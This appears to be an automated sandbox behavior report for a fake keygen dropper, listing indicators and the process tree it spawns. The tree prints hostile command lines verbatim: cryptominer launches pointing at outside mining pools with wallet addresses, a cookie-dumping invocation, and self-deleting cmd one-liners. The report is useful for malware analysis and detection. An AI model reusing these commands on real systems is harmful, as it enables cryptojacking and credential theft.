HTTP User-Agent header	157	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	162	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	326	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	333	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

setups.tmpmultitimer.exerundll32.exesvchost.exe

pid	process
1488	setups.tmp
1488	setups.tmp
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
2220	multitimer.exe
4916	rundll32.exe
4916	rundll32.exe
1136	svchost.exe
1136	svchost.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

MicrosoftEdgeCP.exe

pid process

4372 MicrosoftEdgeCP.exe
4372 MicrosoftEdgeCP.exe

pid	process
4372	MicrosoftEdgeCP.exe
4372	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

Processes:

Setup.exeaskinstall20.exemultitimer.exetaskkill.exeMicrosoftEdge.exeMicrosoftEdgeCP.exemultitimer.exerundll32.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2084	Setup.exe
Token: SeCreateTokenPrivilege	3664	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	3664	askinstall20.exe
Token: SeLockMemoryPrivilege	3664	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	3664	askinstall20.exe
Token: SeMachineAccountPrivilege	3664	askinstall20.exe
Token: SeTcbPrivilege	3664	askinstall20.exe
Token: SeSecurityPrivilege	3664	askinstall20.exe
Token: SeTakeOwnershipPrivilege	3664	askinstall20.exe
Token: SeLoadDriverPrivilege	3664	askinstall20.exe
Token: SeSystemProfilePrivilege	3664	askinstall20.exe
Token: SeSystemtimePrivilege	3664	askinstall20.exe
Token: SeProfSingleProcessPrivilege	3664	askinstall20.exe
Token: SeIncBasePriorityPrivilege	3664	askinstall20.exe
Token: SeCreatePagefilePrivilege	3664	askinstall20.exe
Token: SeCreatePermanentPrivilege	3664	askinstall20.exe
Token: SeBackupPrivilege	3664	askinstall20.exe
Token: SeRestorePrivilege	3664	askinstall20.exe
Token: SeShutdownPrivilege	3664	askinstall20.exe
Token: SeDebugPrivilege	3664	askinstall20.exe
Token: SeAuditPrivilege	3664	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	3664	askinstall20.exe
Token: SeChangeNotifyPrivilege	3664	askinstall20.exe
Token: SeRemoteShutdownPrivilege	3664	askinstall20.exe
Token: SeUndockPrivilege	3664	askinstall20.exe
Token: SeSyncAgentPrivilege	3664	askinstall20.exe
Token: SeEnableDelegationPrivilege	3664	askinstall20.exe
Token: SeManageVolumePrivilege	3664	askinstall20.exe
Token: SeImpersonatePrivilege	3664	askinstall20.exe
Token: SeCreateGlobalPrivilege	3664	askinstall20.exe
Token: 31	3664	askinstall20.exe
Token: 32	3664	askinstall20.exe
Token: 33	3664	askinstall20.exe
Token: 34	3664	askinstall20.exe
Token: 35	3664	askinstall20.exe
Token: SeDebugPrivilege	2220	multitimer.exe
Token: SeDebugPrivilege	816	taskkill.exe
Token: SeDebugPrivilege	2344	MicrosoftEdge.exe
Token: SeDebugPrivilege	2344	MicrosoftEdge.exe
Token: SeDebugPrivilege	2344	MicrosoftEdge.exe
Token: SeDebugPrivilege	2344	MicrosoftEdge.exe
Token: SeDebugPrivilege	4440	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4440	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4440	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4440	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4672	multitimer.exe
Token: SeDebugPrivilege	4916	rundll32.exe
Token: SeDebugPrivilege	4916	rundll32.exe
Token: SeTcbPrivilege	1136	svchost.exe
Token: SeDebugPrivilege	4916	rundll32.exe
Token: SeDebugPrivilege	4916	rundll32.exe
Token: SeDebugPrivilege	4916	rundll32.exe
Token: SeDebugPrivilege	4916	rundll32.exe
Token: SeDebugPrivilege	4916	rundll32.exe
Token: SeDebugPrivilege	4916	rundll32.exe
Token: SeDebugPrivilege	4916	rundll32.exe
Token: SeDebugPrivilege	4916	rundll32.exe
Token: SeDebugPrivilege	4916	rundll32.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

setups.exesetups.tmpMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid process

2064 setups.exe
1488 setups.tmp
2344 MicrosoftEdge.exe
4372 MicrosoftEdgeCP.exe
4372 MicrosoftEdgeCP.exe

pid	process
2064	setups.exe
1488	setups.tmp
2344	MicrosoftEdge.exe
4372	MicrosoftEdgeCP.exe
4372	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Hello_keygen_by_KeygenNinja.execmd.exekeygen-pr.exekeygen-step-3.exekeygen-step-4.exekey.execmd.exeSetup.exesetups.exeaskinstall20.execmd.exemultitimer.exemultitimer.exeFull Program Features.exeWScript.exerundll32.exe

description	pid	process	target process
PID 496 wrote to memory of 3688	496	Hello_keygen_by_KeygenNinja.exe	cmd.exe
PID 496 wrote to memory of 3688	496	Hello_keygen_by_KeygenNinja.exe	cmd.exe
PID 496 wrote to memory of 3688	496	Hello_keygen_by_KeygenNinja.exe	cmd.exe
PID 3688 wrote to memory of 4072	3688	cmd.exe	keygen-pr.exe
PID 3688 wrote to memory of 4072	3688	cmd.exe	keygen-pr.exe
PID 3688 wrote to memory of 4072	3688	cmd.exe	keygen-pr.exe
PID 3688 wrote to memory of 512	3688	cmd.exe	keygen-step-1.exe
PID 3688 wrote to memory of 512	3688	cmd.exe	keygen-step-1.exe
PID 3688 wrote to memory of 512	3688	cmd.exe	keygen-step-1.exe
PID 3688 wrote to memory of 1184	3688	cmd.exe	keygen-step-3.exe
PID 3688 wrote to memory of 1184	3688	cmd.exe	keygen-step-3.exe
PID 3688 wrote to memory of 1184	3688	cmd.exe	keygen-step-3.exe
PID 3688 wrote to memory of 652	3688	cmd.exe	keygen-step-4.exe
PID 3688 wrote to memory of 652	3688	cmd.exe	keygen-step-4.exe
PID 3688 wrote to memory of 652	3688	cmd.exe	keygen-step-4.exe
PID 4072 wrote to memory of 2356	4072	keygen-pr.exe	key.exe
PID 4072 wrote to memory of 2356	4072	keygen-pr.exe	key.exe
PID 4072 wrote to memory of 2356	4072	keygen-pr.exe	key.exe
PID 1184 wrote to memory of 1252	1184	keygen-step-3.exe	cmd.exe
PID 1184 wrote to memory of 1252	1184	keygen-step-3.exe	cmd.exe
PID 1184 wrote to memory of 1252	1184	keygen-step-3.exe	cmd.exe
PID 652 wrote to memory of 2084	652	keygen-step-4.exe	Setup.exe
PID 652 wrote to memory of 2084	652	keygen-step-4.exe	Setup.exe
PID 2356 wrote to memory of 2976	2356	key.exe	key.exe
PID 2356 wrote to memory of 2976	2356	key.exe	key.exe
PID 2356 wrote to memory of 2976	2356	key.exe	key.exe
PID 1252 wrote to memory of 3956	1252	cmd.exe	PING.EXE
PID 1252 wrote to memory of 3956	1252	cmd.exe	PING.EXE
PID 1252 wrote to memory of 3956	1252	cmd.exe	PING.EXE
PID 2084 wrote to memory of 2220	2084	Setup.exe	multitimer.exe
PID 2084 wrote to memory of 2220	2084	Setup.exe	multitimer.exe
PID 2084 wrote to memory of 2064	2084	Setup.exe	setups.exe
PID 2084 wrote to memory of 2064	2084	Setup.exe	setups.exe
PID 2084 wrote to memory of 2064	2084	Setup.exe	setups.exe
PID 652 wrote to memory of 3664	652	keygen-step-4.exe	askinstall20.exe
PID 652 wrote to memory of 3664	652	keygen-step-4.exe	askinstall20.exe
PID 652 wrote to memory of 3664	652	keygen-step-4.exe	askinstall20.exe
PID 2064 wrote to memory of 1488	2064	setups.exe	setups.tmp
PID 2064 wrote to memory of 1488	2064	setups.exe	setups.tmp
PID 2064 wrote to memory of 1488	2064	setups.exe	setups.tmp
PID 3664 wrote to memory of 3768	3664	askinstall20.exe	cmd.exe
PID 3664 wrote to memory of 3768	3664	askinstall20.exe	cmd.exe
PID 3664 wrote to memory of 3768	3664	askinstall20.exe	cmd.exe
PID 3768 wrote to memory of 816	3768	cmd.exe	taskkill.exe
PID 3768 wrote to memory of 816	3768	cmd.exe	taskkill.exe
PID 3768 wrote to memory of 816	3768	cmd.exe	taskkill.exe
PID 2220 wrote to memory of 4552	2220	multitimer.exe	multitimer.exe
PID 2220 wrote to memory of 4552	2220	multitimer.exe	multitimer.exe
PID 4552 wrote to memory of 4672	4552	multitimer.exe	multitimer.exe
PID 4552 wrote to memory of 4672	4552	multitimer.exe	multitimer.exe
PID 652 wrote to memory of 4728	652	keygen-step-4.exe	Full Program Features.exe
PID 652 wrote to memory of 4728	652	keygen-step-4.exe	Full Program Features.exe
PID 652 wrote to memory of 4728	652	keygen-step-4.exe	Full Program Features.exe
PID 4728 wrote to memory of 4796	4728	Full Program Features.exe	WScript.exe
PID 4728 wrote to memory of 4796	4728	Full Program Features.exe	WScript.exe
PID 4728 wrote to memory of 4796	4728	Full Program Features.exe	WScript.exe
PID 652 wrote to memory of 4820	652	keygen-step-4.exe	file.exe
PID 652 wrote to memory of 4820	652	keygen-step-4.exe	file.exe
PID 652 wrote to memory of 4820	652	keygen-step-4.exe	file.exe
PID 4796 wrote to memory of 4916	4796	WScript.exe	rundll32.exe
PID 4796 wrote to memory of 4916	4796	WScript.exe	rundll32.exe
PID 4796 wrote to memory of 4916	4796	WScript.exe	rundll32.exe
PID 4916 wrote to memory of 1136	4916	rundll32.exe	svchost.exe
PID 4916 wrote to memory of 2676	4916	rundll32.exe	svchost.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1164

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1084

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1036

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2676

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1936

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1352

C:\Users\Admin\AppData\Local\Temp\Hello_keygen_by_KeygenNinja.exe
"C:\Users\Admin\AppData\Local\Temp\Hello_keygen_by_KeygenNinja.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:3688

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4072

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2356

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:2976

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:512

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:3956

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:652

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2084

C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220

C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe" 1 3.1617447926.60684bf6e7233 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4552

C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe" 2 3.1617447926.60684bf6e7233
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4672

C:\Users\Admin\AppData\Local\Temp\eoeqci0ck02\KiffApp1.exe
"C:\Users\Admin\AppData\Local\Temp\eoeqci0ck02\KiffApp1.exe"
8⤵
PID:4188

C:\Users\Admin\AppData\Local\Temp\3amu30zjhkl\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\3amu30zjhkl\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:5008

C:\Users\Admin\AppData\Local\Temp\is-JCFI1.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JCFI1.tmp\Setup3310.tmp" /SL5="$30288,138429,56832,C:\Users\Admin\AppData\Local\Temp\3amu30zjhkl\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:4492

C:\Users\Admin\AppData\Local\Temp\is-KCSJ5.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-KCSJ5.tmp\Setup.exe" /Verysilent
10⤵
PID:5704

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
11⤵
PID:4196

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:5576

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:4340

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
11⤵
PID:5200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 952
12⤵
- Program crash
PID:6772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 936
12⤵
- Program crash
PID:4192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1080
12⤵
- Program crash
PID:3748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1112
12⤵
- Program crash
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1180
12⤵
- Program crash
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1288
12⤵
- Program crash
PID:6492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1376
12⤵
- Program crash
PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1520
12⤵
- Program crash
PID:6252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1620
12⤵
- Program crash
PID:5540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1608
12⤵
- Program crash
PID:6352

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
11⤵
PID:5940

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
11⤵
PID:5276

C:\Users\Admin\AppData\Local\Temp\is-FMIDP.tmp\LabPicV3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FMIDP.tmp\LabPicV3.tmp" /SL5="$20364,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
12⤵
PID:4540

C:\Users\Admin\AppData\Local\Temp\is-BBH54.tmp\ppppppfy.exe
"C:\Users\Admin\AppData\Local\Temp\is-BBH54.tmp\ppppppfy.exe" /S /UID=lab214
13⤵
PID:5496

C:\Program Files\Windows Media Player\ADMCFCNMGR\prolab.exe
"C:\Program Files\Windows Media Player\ADMCFCNMGR\prolab.exe" /VERYSILENT
14⤵
PID:4684

C:\Users\Admin\AppData\Local\Temp\is-F9MHE.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F9MHE.tmp\prolab.tmp" /SL5="$7036A,575243,216576,C:\Program Files\Windows Media Player\ADMCFCNMGR\prolab.exe" /VERYSILENT
15⤵
PID:2168

C:\Users\Admin\AppData\Local\Temp\70-bea60-b8c-8f991-549fadd8e34a7\SHoximaedaejo.exe
"C:\Users\Admin\AppData\Local\Temp\70-bea60-b8c-8f991-549fadd8e34a7\SHoximaedaejo.exe"
14⤵
PID:5652

C:\Users\Admin\AppData\Local\Temp\51-9071d-8c7-894a1-e43b480896b8d\Faecakahule.exe
"C:\Users\Admin\AppData\Local\Temp\51-9071d-8c7-894a1-e43b480896b8d\Faecakahule.exe"
14⤵
PID:1696

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0jiyqzuh.rin\md6_6ydj.exe & exit
15⤵
PID:6188

C:\Users\Admin\AppData\Local\Temp\0jiyqzuh.rin\md6_6ydj.exe
C:\Users\Admin\AppData\Local\Temp\0jiyqzuh.rin\md6_6ydj.exe
16⤵
PID:6424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\50od50fr.rnh\Vidboxtest.exe & exit
15⤵
PID:6528

C:\Users\Admin\AppData\Local\Temp\50od50fr.rnh\Vidboxtest.exe
C:\Users\Admin\AppData\Local\Temp\50od50fr.rnh\Vidboxtest.exe
16⤵
PID:6980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Vidboxtest.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\50od50fr.rnh\Vidboxtest.exe" & del C:\ProgramData\*.dll & exit
17⤵
PID:5536

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Vidboxtest.exe /f
18⤵
- Kills process with taskkill
PID:7112

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
18⤵
- Delays execution with timeout.exe
PID:4872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jg4pkfae.bix\askinstall31.exe & exit
15⤵
PID:7080

C:\Users\Admin\AppData\Local\Temp\jg4pkfae.bix\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\jg4pkfae.bix\askinstall31.exe
16⤵
PID:4744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2zjp4mis.2a4\toolspab1.exe & exit
15⤵
PID:6500

C:\Users\Admin\AppData\Local\Temp\2zjp4mis.2a4\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\2zjp4mis.2a4\toolspab1.exe
16⤵
PID:5428

C:\Users\Admin\AppData\Local\Temp\2zjp4mis.2a4\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\2zjp4mis.2a4\toolspab1.exe
17⤵
PID:6304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xyanwwb0.2ec\GcleanerWW.exe /mixone & exit
15⤵
PID:7044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t4ulaclg.fs1\setup_10.2_mix.exe & exit
15⤵
PID:6520

C:\Users\Admin\AppData\Local\Temp\t4ulaclg.fs1\setup_10.2_mix.exe
C:\Users\Admin\AppData\Local\Temp\t4ulaclg.fs1\setup_10.2_mix.exe
16⤵
PID:2824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2fm10vao.u5f\file.exe & exit
15⤵
PID:2084

C:\Users\Admin\AppData\Local\Temp\2fm10vao.u5f\file.exe
C:\Users\Admin\AppData\Local\Temp\2fm10vao.u5f\file.exe
16⤵
PID:5608

C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
17⤵
PID:4532

C:\Users\Admin\AppData\Local\Temp\9TX5U1RW3N\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\9TX5U1RW3N\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
18⤵
PID:7496

C:\Users\Admin\AppData\Local\Temp\9TX5U1RW3N\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\9TX5U1RW3N\multitimer.exe" 1 3.1617448166.60684ce6a7ba8 101
19⤵
PID:8644

C:\Users\Admin\AppData\Local\Temp\9TX5U1RW3N\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\9TX5U1RW3N\multitimer.exe" 2 3.1617448166.60684ce6a7ba8
20⤵
PID:9164

C:\Users\Admin\AppData\Local\Temp\L2AH5TANXQ\setups.exe
"C:\Users\Admin\AppData\Local\Temp\L2AH5TANXQ\setups.exe" ll
18⤵
PID:7472

C:\Users\Admin\AppData\Local\Temp\is-S5NSK.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S5NSK.tmp\setups.tmp" /SL5="$205EA,635399,250368,C:\Users\Admin\AppData\Local\Temp\L2AH5TANXQ\setups.exe" ll
19⤵
PID:4840

C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"
17⤵
PID:7628

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
18⤵
PID:7252

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
19⤵
PID:7264

C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
17⤵
PID:7536

C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
17⤵
PID:5588

C:\Users\Admin\AppData\Roaming\6F18.tmp.exe
"C:\Users\Admin\AppData\Roaming\6F18.tmp.exe"
18⤵
PID:8500

C:\Users\Admin\AppData\Roaming\6F18.tmp.exe
"C:\Users\Admin\AppData\Roaming\6F18.tmp.exe"
19⤵
PID:8436

C:\Users\Admin\AppData\Roaming\7DFE.tmp.exe
"C:\Users\Admin\AppData\Roaming\7DFE.tmp.exe"
18⤵
PID:8692

C:\Users\Admin\AppData\Roaming\7CF3.tmp.exe
"C:\Users\Admin\AppData\Roaming\7CF3.tmp.exe"
18⤵
PID:8676

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
19⤵
PID:8820

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
19⤵
PID:6620

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
18⤵
PID:5836

C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
17⤵
PID:8248

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ymguuy05.qd2\f7c5e026.exe & exit
15⤵
PID:6972

C:\Users\Admin\AppData\Local\Temp\ymguuy05.qd2\f7c5e026.exe
C:\Users\Admin\AppData\Local\Temp\ymguuy05.qd2\f7c5e026.exe
16⤵
PID:8000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w0dqmqma.4rj\app.exe /8-2222 & exit
15⤵
PID:6852

C:\Users\Admin\AppData\Local\Temp\w0dqmqma.4rj\app.exe
C:\Users\Admin\AppData\Local\Temp\w0dqmqma.4rj\app.exe /8-2222
16⤵
PID:7940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zi25jqcd.iof\Four.exe & exit
15⤵
PID:8964

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
11⤵
PID:4208

C:\Users\Admin\AppData\Local\Temp\is-NAEVP.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NAEVP.tmp\lylal220.tmp" /SL5="$2034C,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
12⤵
PID:4304

C:\Users\Admin\AppData\Local\Temp\is-8B4CC.tmp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\is-8B4CC.tmp\Microsoft.exe" /S /UID=lylal220
13⤵
PID:5996

C:\Program Files\Uninstall Information\FLNQIGQKBP\irecord.exe
"C:\Program Files\Uninstall Information\FLNQIGQKBP\irecord.exe" /VERYSILENT
14⤵
PID:1716

C:\Users\Admin\AppData\Local\Temp\is-0VADR.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0VADR.tmp\irecord.tmp" /SL5="$7034A,6265333,408064,C:\Program Files\Uninstall Information\FLNQIGQKBP\irecord.exe" /VERYSILENT
15⤵
PID:2188

C:\Users\Admin\AppData\Local\Temp\86-e5a3f-504-88fa1-1909528f24da8\Givacylyme.exe
"C:\Users\Admin\AppData\Local\Temp\86-e5a3f-504-88fa1-1909528f24da8\Givacylyme.exe"
14⤵
PID:4344

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b5a1szqw.nej\md6_6ydj.exe & exit
15⤵
PID:5496

C:\Users\Admin\AppData\Local\Temp\b5a1szqw.nej\md6_6ydj.exe
C:\Users\Admin\AppData\Local\Temp\b5a1szqw.nej\md6_6ydj.exe
16⤵
PID:6808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\swv4x1wj.nvt\Vidboxtest.exe & exit
15⤵
PID:5408

C:\Users\Admin\AppData\Local\Temp\swv4x1wj.nvt\Vidboxtest.exe
C:\Users\Admin\AppData\Local\Temp\swv4x1wj.nvt\Vidboxtest.exe
16⤵
PID:6888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 768
17⤵
- Program crash
